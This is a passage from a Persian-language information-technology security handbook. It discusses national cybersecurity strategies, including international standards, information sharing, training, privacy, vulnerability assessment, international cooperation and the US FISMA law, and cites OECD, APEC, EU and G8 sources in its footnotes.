‫ﺷﺒﻜﻪﻫﺎ ﺗﺪﻭﻳﻦ ﻧﻤﻮﺩ‪ ٤٦.‬ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﻭ ﺗﻮﺳـﻌﺔ ﺍﻗﺘـﺼﺎﺩﻱ‬
‫)‪ ٤٧(OECD‬ﻧﻴﺰ ﺧـﻂﻣـﺸﻲﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺩﻭﻟﺘﻬـﺎ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ‬
‫ﺧﺼﻮﺻﻲ ﺩﺭ ﺧﺼﻮﺹ ﺗﻬﻴﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﻣﻨﺘـﺸﺮ‬
‫‪٤٨‬‬
‫ﺳﺎﺧﺖ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٤٠‬‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﻣﻮﻗﻌﻴﺘﻬﺎ ﻭ ﻧﻘﺶ‬
‫‪٥٠‬‬
‫ﺧﻮﺩ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ‪".‬‬
‫•‬
‫ﺗﺠﺮﺑﻴﺎﺕ‪ ،‬ﺭﺍﻫﺒﺮﺩﻫﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺗﻌﺪﺍﺩ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‬
‫ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ ،‬ﺑـﺼﻮﺭﺕ ﺩﺍﻭﻃﻠﺒﺎﻧـﻪ ﻭ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺗﻬﻴﻪ ﺷﻮﺩ ﻭ ﺗﺠﺮﺑﻴﺎﺕ ﺍﺯ ﻃﺮﻳـﻖ ﻣﺆﺳـﺴﺎﺕ‬
‫ﻣﺸﺎﻭﺭ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﺗﻮﺳـﻌﻪ ﻳﺎﺑـﺪ‪.‬‬
‫ﺍﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍﻫﻨﻤﺎﻱ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﺍﺧﻠﻲ‬
‫ﺩﻭﻟﺖ ﻫﺴﺘﻨﺪ‪ .‬ﺩﻭﻟﺖ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﺩ ﻭ ﻧﺒﺎﻳـﺪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ‬
‫‪٥١‬‬
‫ﻓﻨﻲ ﺑﺮﺍﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﻌﻴﻴﻦ ﻛﻨﺪ‪.‬‬
‫•‬
‫ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ‬
‫ﻼ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ‬
‫ﻛﺎﻣ ﹰ‬
‫ﺑﺎ ﺑﻲﺗﻮﺟﻬﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻧﺴﺒﺖ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺣﻤـﻼﺕ‬
‫ﻣﻮﺍﺟﻪ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺑﺎﻳـﺪ‬
‫ﺗﺸﻮﻳﻖ ﺷﻮﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺎ ﺳـﺎﻳﺮ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﻳﻦ ﺑﺨﺶ‪ ،‬ﺑﺎ ﺩﻭﻟﺖ‪ ،‬ﻭ ﻧﻴﺰ ﺑﺎ ﺳـﺎﻳﺮ ﻛـﺸﻮﺭﻫﺎ‬
‫ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ‪.‬‬
‫•‬
‫ﺁﻣﻮﺯﺵ ﻭ ﭘﺮﻭﺭﺵ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺁﺳـﻴﺎ )‪(APEC‬‬
‫ﻣﻲﮔﻮﻳﺪ‪" :‬ﺗﻮﺳﻌﺔ ﻣﻨﺎﺑﻊ ﺍﻧـﺴﺎﻧﻲ ﺑـﺮﺍﻱ ﺑـﻪ ﺛﻤـﺮ ﺭﺳـﻴﺪﻥ‬
‫ﺗﻼﺷﻬﺎ ﺩﺭ ﺟﻬﺖ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴـﺖ ﺍﻣـﺮﻱ ﺿـﺮﻭﺭﻱ‬
‫ﺍﺳﺖ‪ .‬ﺑﻤﻨﻈﻮﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ‪ ،‬ﺩﻭﻟﺘﻬـﺎ ﻭ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺁﻧﻬﺎ ﺑﺎﻳـﺪ ﻛﺎﺭﻛﻨـﺎﻥ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﻣﻮﺿــﻮﻋﺎﺕ ﭘﻴﭽﻴــﺪﺓ ﻓﻨــﻲ ﻭ ﻗــﺎﻧﻮﻧﻲ ﺑــﺎ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ‬
‫‪APEC Cybersecurity Strategy,‬‬
‫‪http://www.apecsec.org.sg/content/apec/apec‬‬
‫‪_groups/working_groups/telecommunications‬‬
‫‪_and_information.html‬‬
‫‪Council of European Union, Council‬‬
‫‪Resolution of 28 January 2002 on a common‬‬
‫‪approach & specific actions in the area of‬‬
‫‪network & information security, (2002/C 43/02),‬‬
‫‪http://www.europa.eu.int/information_society/e‬‬
‫‪europe/action_plan/safe/netsecres_en.pdf‬‬
‫‪۵۱‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﻢ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﻭ ﻫﻢ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﭼﻨـﻴﻦ ﻣـﻲﮔﻮﻳـﺪ ﻛـﻪ‬
‫ﺩﻭﻟﺖ ﻧﺒﺎﻳﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﺤﻤﻴـﻞ‬
‫ﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪The National Strategy to Secure Cyberspace‬‬
‫‪[U.S.], February 2003, pp. 11, 15‬‬
‫‪http://www.whitehouse.gov/pcipb‬‬
‫‪http://www.dhs.gov/interweb/assetlibrary/Natio‬‬
‫‪nal_Cyberspace_Strategy.pdf‬‬
‫‪50‬‬
‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ﻭ ﺟـﺮﺍﺋﻢ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺁﻣـﻮﺯﺵ‬
‫ﺩﻫﻨﺪ‪".‬‬
‫‪٥٢‬‬
‫•‬
‫ﺍﻫﻤﻴﺖ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ‪ ICT‬ﺩﺍﺩﻩﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﺣـﺴﺎﺱ ﺷﺨـﺼﻲ ﺭﺍ‬
‫ﺍﻧﺘﻘﺎﻝ ﻣﻲ ﺩﻫﻨﺪ ﻭ ﺫﺧﻴﺮﻩ ﻣﻲﺳﺎﺯﻧﺪ‪ .‬ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺟﺰﺀ‬
‫ﺿﺮﻭﺭﻱ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﺳـﺖ ﻭ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺳﺎﺯﮔﺎﺭ ﺑﺎ ﺍﺭﺯﺷﻬﺎﻱ‬
‫‪٥٣‬‬
‫ﻣﻬﻢ ﺟﺎﻣﻌﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﺩ‪.‬‬
‫•‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ‪ ،‬ﻫﺸﺪﺍﺭ ﻭ ﻋﻜﺲﺍﻟﻌﻤﻞ‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜـﺎﺭﻱ ﺍﻗﺘـﺼﺎﺩﻱ‬
‫ﺁﺳﻴﺎ ﺍﺑﺮﺍﺯ ﺩﺍﺷﺖ‪" :‬ﻣﺒﺎﺭﺯﺓ ﻣﺆﺛﺮ ﺑﺎ ﺗﺨﻠﻔﺎﺕ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ‬
‫ﻭ ﺣﻔﺎﻇـــﺖ ﺍﺯ ﺍﻃﻼﻋـــﺎﺕ ﺯﻳﺮﺳـــﺎﺧﺘﻲ‪ ،‬ﻭﺍﺑـــﺴﺘﻪ ﺑـــﻪ‬
‫ﺍﻗﺘــﺼﺎﺩﻫﺎﻳﻲ ﺍﺳــﺖ ﻛــﻪ ﺳﻴــﺴﺘﻤﻬﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﺭﺯﻳــﺎﺑﻲ‬
‫ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎ ﺩﺍﺭﻧـﺪ ﻭ ﻫـﺸﺪﺍﺭﻫﺎﻱ ﻻﺯﻡ ﺭﺍ‬
‫ﺻﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ‬
‫ﻳﻚ ﺗﻬﺪﻳﺪ ﻗﺒﻞ ﺍﺯ ﺁﻧﻜﻪ ﻣﻮﺟﺐ ﺁﺳﻴﺐ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺷـﻮﺩ‪،‬‬
‫ﺷﺒﻜﻪﻫﺎ ﺑﻬﺘﺮ ﻣﺤﺎﻓﻈﺖ ﻣﻲﺷﻮﻧﺪ‪ ٥٤".‬ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻳﺎﻻﺕ‬
‫ﻣﺘﺤﺪﻩ ﺍﺯ ﻋﻤﻮﻡ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﺧﻮﺍﺳﺘﻪ ﺑﻮﺩ ﺩﺭ ﺍﻳﺠﺎﺩ ﻳـﻚ‬
‫ﺳﻴﺴﺘﻢ ﻛﻪ ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﭘﺎﺳﺨﮕﻮﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﺷـﺪ‬
‫ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ ﺗﺎ ﺣﻤﻼﺕ ﻭﺍﺭﺩ ﺑﻪ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺑﺴﺮﻋﺖ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﻧﺪ‪.‬‬
‫•‬
‫ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‬
‫ﺑﺮﺍﻱ ﺳﺎﺩﻩﺗﺮ ﻛـﺮﺩﻥ ﺗﺒـﺎﺩﻝ ﻧﻈـﺮ ﻭ ﻫﻤﻜـﺎﺭﻱ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﮔﺴﺘﺮﺵ ﻳﻚ "ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺘـﻲ" ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ‬
‫ﺧﺼﻮﺻﻲ ﺩﺭ ﺳﻄﺢ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‪ ،‬ﺩﻭﻟﺘﻬﺎ ﺑﺎﻳـﺪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ‬
‫ﻫﻤﻜﺎﺭﻱ ﻛﻨﻨﺪ ﺗـﺎ ﺑـﺮﺍﻱ ﺟـﺮﺍﺋﻢ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﻗـﻮﺍﻧﻴﻦ‬
‫ﺳــﺎﺯﮔﺎﺭﻱ ﺑــﻪ ﺗــﺼﻮﻳﺐ ﺑﺮﺳــﺎﻧﻨﺪ ﻭ ﻧﻴﺮﻭﻫــﺎﻱ ﺍﻧﺘﻈــﺎﻣﻲ‬
‫‪Respect for Privacy‬‬
‫‪OECD Guidelines for the Security of‬‬
‫‪Information Systems and Networks: Towards‬‬
‫‪a Culture of Security, July 25, 2002,‬‬
‫‪http://www.oecd.org/pdf/M00034000/M000340‬‬
‫‪00.pdf‬‬
‫‪52‬‬
‫‪53‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ ﺑـﻪ ﺁﺩﺭﺳـﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﭘـﺎﻭﺭﻗﻲ ﺷـﻤﺎﺭﻩ ‪۴۸‬‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪APEC Cybersecurity Strategy,‬‬
‫‪http://www.apecsec.org.sg/content/apec/apec‬‬
‫‪_groups/working_groups/telecommunications‬‬
‫‪_and_information.html‬‬
‫‪54‬‬
‫‪٢٤١‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﺎﻳﺪ ﺍﺯ ﻃﺮﻳﻖ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ‬
‫‪٥٥‬‬
‫ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺭﻭﻧﺪ ﺗﻮﺳﻌﻪ ﻭ ﺍﺟﺮﺍﻱ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑـﺮﺍﻱ ﺩﻭﻟـﺖ‪،‬‬
‫ﻋﻨﺎﺻﺮ ﻣﺸﺘﺮﻛﻲ ﺑﺎ ﺗﻮﺳﻌﻪ ﻭ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﺔ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﺩﺭ‬
‫ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺍﻓﺮﺍﺩ ﺣﻘﻮﻗﻲ ﺩﺍﺭﺩ‪:‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ؛‬
‫ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺁﮔﺎﻫﻲ؛‬
‫ﮔﻤــﺎﺭﺩﻥ ﻳﻜﻨﻔــﺮ ﺑﻌﻨــﻮﺍﻥ ﻓﺮﻣﺎﻧــﺪﻩ ﺑــﺮﺍﻱ ﺍﻳﺠــﺎﺩ‬
‫ﻫﻤﺎﻫﻨﮕﻲ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎ؛‬
‫‪٥٦‬‬
‫ﺗﻮﺳﻌﺔ ﺑﺮﻧﺎﻣﺔ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ ؛‬
‫ﺗﻄﺒﻴﻖ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ؛‬
‫ﺗﻮﺟﻴﻪ ﺳﺎﺧﺘﺎﺭﻱ؛ ﻭ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﺩﻭﺭﻩﺍﻱ ﻭ ﺍﺭﺗﻘﺎﻱ ﻣﺪﺍﻭﻡ‪.‬‬
‫‪Meeting of G8 Ministers of Justice & Home‬‬
‫‪Affairs, Paris, May 5, 2003,‬‬
‫‪http://www.g8.utoronto.ca/justice/justice03050‬‬
‫‪5.htm‬‬
‫‪Risk Management‬‬
‫‪Ministerial Council for Promoting the‬‬
‫‪Digitization of Public Administration‬‬
‫‪http://www.kantei.go.jp/foreign/it/‬‬
‫‪network/priority-all/7.html‬‬
‫‪Federal Information Security Management Act‬‬
‫ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﺩﺭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ‪ -‬ﺭﺍﻫﻜﺎﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‬
‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻭﻟﺖ‬
‫ﺑﺎ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮﻱ ﻣﺸﺨﺺ ﺷﺪﻩ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻣﺼﻮﺑﺔ ﻣـﺪﻳﺮﻳﺖ‬
‫‪٦٢‬‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ )ﻣﺼﻮﺏ ﺳﺎﻝ ‪ (۲۰۰۲‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷـﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺑﺮﺧﻲ ﺭﻭﺷﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺑـﻪ‬
‫ﺗﺼﻮﻳﺮ ﻣﻲ ﻛﺸﺪ ﻛﻪ ﺑﺎﻋﺚ ﻣـﻲﺷـﻮﻧﺪ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫"ﭘﺎﺳﺨﮕﻮﻳﻲ" ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ‪.‬‬
‫ﻫﺪﻑ ﻣﺸﺨﺺ ‪ FISMA‬ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺩﺭ ﮔـﺴﺘﺮﺓ‬
‫ﺩﻭﻟﺖ ﺍﺳﺖ‪ ،‬ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻫﻤﺔ ﺗﻼﺷﻬﺎﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑـﺮﺍﻱ‬
‫ﺍﻳﻤــﻦﺳــﺎﺯﻱ ﺍﻃﻼﻋــﺎﺕ ﺑــﺎ ﻳﻜــﺪﻳﮕﺮ ﻫﻤﺎﻫﻨــﮓ ﺷــﻮﻧﺪ ﻭ ﻧﻴــﺰ‬
‫ﺭﺍﻫﻜﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻬﻴﻪ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺣﺪﺍﻗﻞ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻻﺯﻡ ﺟﻬـﺖ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻭﻟـﺖ ﺍﺭﺍﺋـﻪ ﮔـﺮﺩﺩ‪ .‬ﻗـﺎﻧﻮﻥ‬
‫ﺗﺼﺪﻳﻖ ﻣﻲﻛﻨﺪ ﻛـﻪ ﻣﺤـﺼﻮﻻﺕ ﺗﺠـﺎﺭﻱ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻣـﺆﺛﺮ ﻭ‬
‫ﭘﻮﻳﺎﻳﻲ ﺑﺮﺍﻱ ﺩﻭﻟـﺖ ﻓـﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﻧﺪ ﻭ ﺍﻧﺘﺨـﺎﺏ ﺭﺍﻩﺣﻠﻬـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺗﺨﺼﺼﻲ ﻭﺍﮔﺬﺍﺭ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫‪ FISMA‬ﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺭﺋﻴﺲ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﻳـﺪ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺣﻴﻄﺔ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺗﻬﻴـﻪ‪ ،‬ﻣـﺴﺘﻨﺪﺳﺎﺯﻱ ﻭ‬
‫ﺍﺟﺮﺍ ﻛﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻛﺎﺭﻫﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺍﺯ ﺟﻤﻠـﻪ ﺁﻧﺪﺳـﺘﻪ ﻛـﻪ‬
‫ﺗﻮﺳﻂ ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ﻣﺪﻳﺮﻳﺖ ﻣـﻲﺷـﻮﺩ ﺭﺍ ﺩﺭ ﺑـﺮ ﺑﮕﻴـﺮﺩ‪ ٦٣.‬ﺍﻳـﻦ‬
‫ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﺎﺷﺪ‪:‬‬
‫•‬
‫‪Federal Information Security Management‬‬
‫‪Act, Title III of E-Government Act of 2002,‬‬
‫‪Pub. Law 107-347,‬‬
‫‪http://csrc.nist.gov/policies/FISMA-final.pdf‬‬
‫‪Auditing‬‬
‫‪55‬‬
‫‪56‬‬
‫‪57‬‬
‫‪58‬‬
‫‪59‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺘﻨﺎﻭﺏ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﻣﻴﺰﺍﻥ ﺁﺳـﻴﺒﻲ ﻛـﻪ ﻣﻤﻜـﻦ‬
‫‪٦٤‬‬
‫ﺍﺳﺖ ﺑﻪ ﺩﻻﻳﻠـﻲ ﭼـﻮﻥ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ )ﺍﺳـﺘﻔﺎﺩﻩ‪،‬‬
‫‪۶۲‬‬
‫‪60‬‬
‫‪61‬‬
‫ﺑﻪ ﭘﺎﻭﺭﻗﻲ ﻗﺒﻠﻲ ﻣﺮﺍﺟﻌﻪ ﺷﻮﺩ‪ ،‬ﻭ ﻧﻴﺰ‪:‬‬
‫‪http://www.fedcirc.gov/library/legislations/FIS‬‬
‫‪MA.html‬‬
‫‪Title 44, United States Code, section 3544‬‬
‫‪Unauthorized Access‬‬
‫‪63‬‬
‫‪64‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﻓــﺎﺯ ﭼﻬــﺎﺭﻡ )ﺑــﺎ ﺗﻤﺮﻛــﺰ ﺑــﺮ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﺩﻭﻟﺘــﻲ( ﺍﻋــﻼﻡ‬
‫ﺧﻂﻣﺸﻲﻫﺎﻱ ﻭ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺳـﺖ‪.‬‬
‫ﺑﺮﺧــﻲ ﻛــﺸﻮﺭﻫﺎ ﻣﺜــﻞ ﮊﺍﭘــﻦ ﻭ ﺍﻳﺘﺎﻟﻴــﺎ ﺍﺯ ﻃﺮﻳــﻖ ﭼﻨــﻴﻦ‬
‫ﺧﻂﻣﺸﻲﻫﺎﻳﻲ ﺑﻪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﭘﺮﺩﺍﺧﺘـﻪﺍﻧـﺪ‪ .‬ﺩﺭ ﺟـﻮﻻﻱ ﺳـﺎﻝ‬
‫‪ ۲۰۰۰‬ﻛﻤﻴﺘﺔ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﮊﺍﭘـﻦ ﺩﺭ ﺳـﻄﺢ‬
‫ﻛﺎﺑﻴﻨﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺍﺗﺨﺎﺫ ﻛﺮﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﺍﺯ ﺗﻤﺎﻣﻲ ﺍﺩﺍﺭﺍﺕ ﻭ ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫـﺎ ﺧﻮﺍﺳـﺘﻪ‬
‫ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﺗﺎ ﻓﻮﺭﻳﻪ ‪ ۲۰۰۳‬ﻳﻚ ﺍﺭﺯﻳﺎﺑﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
